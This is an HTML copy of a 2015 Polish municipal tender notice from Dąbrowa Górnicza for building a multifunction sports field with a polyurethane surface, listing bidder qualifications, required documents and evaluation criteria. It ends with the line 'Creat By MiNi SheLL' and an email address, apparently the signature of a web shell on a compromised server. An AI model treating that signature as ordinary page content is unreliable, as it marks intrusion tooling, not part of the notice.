4.	Wszystkie dostarczone i zamontowane urządzenia sportowe i piłkochwyty musza spełniać wymogi bezpieczeństwa i ergonomii, muszą być zgodne z normami lub dokumentami równoważnymi  wprowadzonymi do obowiązkowego  stosowania oraz wymaganiami określonymi w przepisach BHP oraz pozostałych przepisów prawa. Zastosowany sprzęt sportowy musi posiadać aktualne certyfikaty i  dopuszczenia do stosowania ze znakiem B.

5.	Wykonawca jest odpowiedzialny za prowadzenie robót zgodnie z obowiązującymi przepisami, normami i wytycznymi producenta nawierzchni syntetyczne poliuretanowej, urządzeń sportowych i piłkochwytów. Jednocześnie winien przestrzegać warunków umowy oraz odpowiada za jakość zastosowanych materiałów i wykonanego montażu oraz za ich zgodność z przedmiotem zamówienia. 
 
5. Roboty należy zrealizować na podstawie ;
-  Programu Funkcjonalno - Użytkowego
-  wymogów  Specyfikacji Istotnych Warunków Zamówienia  wraz z projektem umowy,
- zasad wiedzy technicznej , sztuki budowlanej  i przepisów prawa     

6.	Zamówienie musi  być realizowane  zgodnie z:
Ustawą  z dnia 7 lipca  1994 roku  Prawo budowlane (Dz. U. z 2013 r. poz.1409 z późn. zm) Rozporządzeniem  Ministra Pracy i Polityki Socjalnej z dnia  26 września  1997 r. w sprawie ogólnych przepisów bezpieczeństwa  i higieny pracy (Dz. U. z 2003 r. Nr 169,poz.1650 z późn. zm).

7.	Rozwiązania  równoważne:
1.	Wskazane w SIWZ znaki towarowe, patenty i miejsce pochodzenia są uzasadnione specyfikacją  przedmiotu  zamówienia i mają na celu  wskazanie jedynie jakości i parametrów przedmiotu zamówienia  z uwagi  na brak innych dostatecznie dokładnych określeń, które pozwalałyby opisać przedmiot zamówienia  w tej części w sposób jednoznaczny  i wyczerpujący. W związku z powyższym Wykonawcy mogą składać oferty równoważne w stosunku do przedmiotu zamówienia przedstawionego w SIWZ - zgodnie z art. 30 ust.4 i 5 ustawą. 
2.	W związku z tym:
2.1.Zamawiajacy dopuszcza zastosowanie materiałów i urządzeń równoważnych - tj. o parametrach jakościowych nie gorszych niż określone w SIWZ - w odniesieniu do materiałów i urządzeń, których pochodzenie zostało określone przez Zamawiającego  w SIWZ  nazwą producenta.
2.2. Zgodnie z art. 30 ust. 5 ustawy Wykonawca, który powołuje się na rozwiązania równoważne  opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane  spełniają  wymagania określone przez Zamawiającego. Równoważność pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych  ma w szczególności  gwarantować realizację  robót w zgodzie z SIWZ i P.F.U. oraz zapewnić uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej  SIWZ.

8.	Gwarancja i rękojmi:
Wykonawca udziela 36 miesiące gwarancji na wykonane roboty licząc od daty podpisania przez obie strony protokołu odbioru wykonania przedmiotu umowy. W okresie tym Wykonawca zobowiązuje się usunąć  wynikłe wady nieodpłatnie w terminie do pięciu  dni od daty zgłoszenia ich przez Zamawiającego. 
Na wykonane  roboty Wykonawca  udziela  rękojmi na okres 24 miesięczny  licząc od daty podpisania  przez obie strony protokołu odbioru wykonania przedmiotu umowy. 

9.	W przypadku zatrudnienia Wykonawcę personelu obcojęzycznego
Wykonawca zapewni ciągłą możliwość porozumiewania się personelu Zamawiającego z personelem Wykonawcy w języku polskim..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.11.12.00-0, 45.23.24.52-5, 45.21.22.00-8, 45.34.20.00-6, 45.11.27.00-2, 45.23.32.22-1, 45.11.12.00-0, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości 25 000,00 zł (słownie: dwadzieścia pięć tysięcy złotych) w formach określonych w art. 45 ust. 6 Ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Wykonawca
potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu
wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, Wykonawca wykonał zgodnie z zasadami sztuki budowlanej  i prawidłowo ukończył roboty budowlane polegające na  budowie, przebudowie lub modernizacji:
-  minimum 2 obiektów sportowych, z których każdy składa się  z boiska wielofunkcyjnego o pow. min. 900 m2, wykonanego w technologii nawierzchni natryskowej  z warstwą użytkową  w min. trzech kolorach wraz z robotami towarzyszącymi - wartość  każdej  z w/w robót min. 300 000,00 zł  brutto. 

- minimum 1 obiektu sportowego w systemie Zaprojektuj i wybuduj - (tj. wykonanie dokumentacji projektowej wraz z realizacją robót budowlanych) który składa się z boiska wielofunkcyjnego o pow. min. 800 m2, wykonanego w technologii nawierzchni natryskowej  z warstwą użytkową  w min. trzech kolorach wraz robotami towarzyszącymi - o wartości  robót: minimum 300 000,00 zł brutto.

 Uwagi: 
1. Jeżeli zakres robót przedstawionych w dokumencie złożonym na potwierdzenie, że roboty budowlane zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej  i prawidłowo  ukończone jest szerszy od powyżej określonego przez Zamawiającego należy w wykazie robót budowlanych podać wartość robót odpowiadających zakresowi przedmiotu zamówienia.
2. Równowartość w złotych zadań rozliczanych w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego  w dniu, w którym ogłoszenie o niniejszym postępowaniu zostało zamieszczone w Biuletynie Zamówień Publicznych.
3. W przypadku, gdy Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełniania warunku doświadczenia, zobowiązany jest wykazać udział tych podmiotów w wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia o spełnieniu wymagań określonych w art. 22 ust. 1 Ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej:       
- 1 osobą posiadająca uprawnienia do kierowania robotami w specjalności konstrukcyjno - budowlanej, 
- 1 osobą posiadającą  uprawnienia  budowlane  w zakresie  projektowania w specjalności architektonicznej,
- 1 osobą posiadającą uprawnienia  budowlane  w zakresie projektowania w specjalności konstrukcyjno -budowlanej  
zgodnie  z ustawą z dnia  7 lipca 1994 r. Prawo budowlane (Dz. U z 2013 r. poz. 1409 z póżn. zm.) lub odpowiadające im ważne uprawnienia budowlane.  

Zamawiający dopuszcza posiadanie przez 1 osobę więcej niż jednego z ww. uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada:
a) środki finansowe w wysokości co najmniej 1 000 000,00 zł lub zdolność kredytową w wysokości co najmniej 1 000 000,00 zł,

b) posiada ubezpieczenie od odpowiedzialności  cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  800 000,00 zł.

Równowartość w złotych posiadanych środków finansowych lub zdolności kredytowej w walutach obcych zostanie określona według średniego kursu złotego w stosunku do walut obcych ogłoszonego przez NBP obowiązującego w dniu, w którym ogłoszenie o niniejszym postępowaniu zostało zamieszczone w Biuletynie Zamówień Publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie oraz złożenia dowodów dotyczy robót budowlanych pozwalających wykazać, iż Wykonawca spełnia warunek określony w pkt. 8.1.2. SIWZ.  W wykazie nie należy podawać informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie - Zamawiający nie ocenia zdolności Wykonawcy do należytego wykonania zamówienia na podstawie art. 22 ust. 5 Ustawy (zdanie 2).;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, ze oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda, aby Wykonawca załączył do oferty:
1. raport z badań sporządzony przez laboratorium badające nawierzchnie sportowe (np. Labosport, ISA Sport, itp.) akredytowane przez IAAF potwierdzający zgodność oferowanych parametrów z wymogami IAAF,
2. atest PZH dla nawierzchni lub dokument równoważny,
3. certyfikat IAAF first class dla obiektu wykonanego z oferowanej nawierzchni,
4. badania ekologiczne na zgodność z DIN V 18035-6 wydane przez akredytowane przez IAAF laboratorium,
5. autoryzację producenta nawierzchni wystawioną dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tę nawierzchnię,
6. aprobatę techniczną ITB lub rekomendację techniczną ITB lub dokument równoważny, potwierdzający e parametry techniczne oferowanej nawierzchni wymagane przez Zamawiającego,
7. aktualny certyfikat IAAF dla oferowanej nawierzchni,
8. kartę techniczną nawierzchni potwierdzona przez producenta systemu,
9. próbkę nawierzchni z metryczką producenta.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy załączyć:
1. formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. potwierdzenie wniesienia wadium;
3.pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
4. dowód oddania przez Podmiot niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie  polegać na zasobach Podmiotu - zgodnie z art. 26 ust. 2b Ustawy: Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość oferowanego systemu nawierzchni poliuretanowej - 40</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie określonym w § 20 ust.1  projektu umowy. 
W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, o których mowa w pkt. 25.4 SIWZ Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i wystąpienia z wnioskiem o dokonanie wskazanej zmiany.   
Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
 Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 7 do SIWZ - projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie
Górniczej, ul. Graniczna 21, Wydział Gospodarki Komunalnej i Mieszkaniowej, III piętro, pokój nr 315..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2015 godzina 11:30, miejsce: adres Urząd  Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter, stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie nie jest finansowane ze środków Unii Europejskiej. 2.Zamawiający wymaga
wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10 % ceny brutto podanej w ofercie.3. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
 W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch  lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt.  9.2. SIWZ przez każdego z nich lub przez pełnomocnika w imieniu każdego z nich. Dokument wymieniony w  pkt. 9.3. SIWZ każdy z Wykonawców składa oddzielnie. 
Dokumenty i oświadczenia wymienione w  pkt. 9.1.2 do 9.1.5 SIWZ Wykonawcy składają wspólnie. Oświadczenie wymienione w pkt. 9.1.1. SIWZ, formularz ofertowy wymieniony w pkt. 9.5.1. SIWZ winny być podpisane przez uprawnionych przedstawicieli Wykonawców. Oświadczenia na podstawie art. 22 ust. 1 Ustawy (załącznik nr 2 do SIWZ) składają  wszyscy wykonawcy wspólnie na jednym druku lub pełnomocnik. W przypadku polisy wymaganej w pkt. 9.1.5. SIWZ Zamawiający dopuszcza także przedstawienie jednej polisy wystawionej na Wykonawców wspólnie ubiegających się o udzielenie  zamówienia.
Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem.

 4. Informacja dodatkowa dotycząca sekcji IV.2.1. kryterium oceny ofert - Jakość oferowanego systemu nawierzchni poliuretanowej.   
Oferty z nawierzchnią poliuretanową o parametrach jakościowych spełniających łącznie wszystkie przedstawione poniżej warunki otrzymają 40 pkt.
Określenie parametru, Jednostka, Wartość wymagana:

-Wytrzymałość na rozciąganie, (N/ mm2) min. 1,1

-Odporność nawierzchni na działanie temperatury, wody i promieniowania UV (sztuczne starzenie) - badanie wg PN-EN 14877:2013:
-zmiana wytrzymałości na rozciąganie, (%), 0
-zmiana odporności na zużycie (ścieranie) po 1000 cyklach badawczych, (%),mniejsze lub równe  0,1
-Odporność na działanie zmiennych cykli hydrotermicznych - oceniona zmianą właściwości technicznych nawierzchni po cyklach badawczych:
-zmniejszenie wytrzymałości na rozciąganie(%), 0
-Odporność nawierzchni na zamrażanie:
-zmniejszenie wytrzymałości na rozciąganie(%) ,mniejsze lub równe 8

Jakość oferowanej nawierzchni poliuretanowej będzie analizowana na podstawie dokumentów załączonych do oferty, wymienionych w pkt. 9.4. SIWZ. 
Maksymalna łączna liczba punktów jaką może uzyskać Wykonawca wynosi - 100 pkt.
Za ofertę najkorzystniejszą uznana będzie oferta, która uzyska najwyższą całkowitą liczbę punktów. 
W przypadku uzyskania przez dwie lub więcej ofert jednakowej ilości punktów wygrywa oferta o najniższej spośród nich cenie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com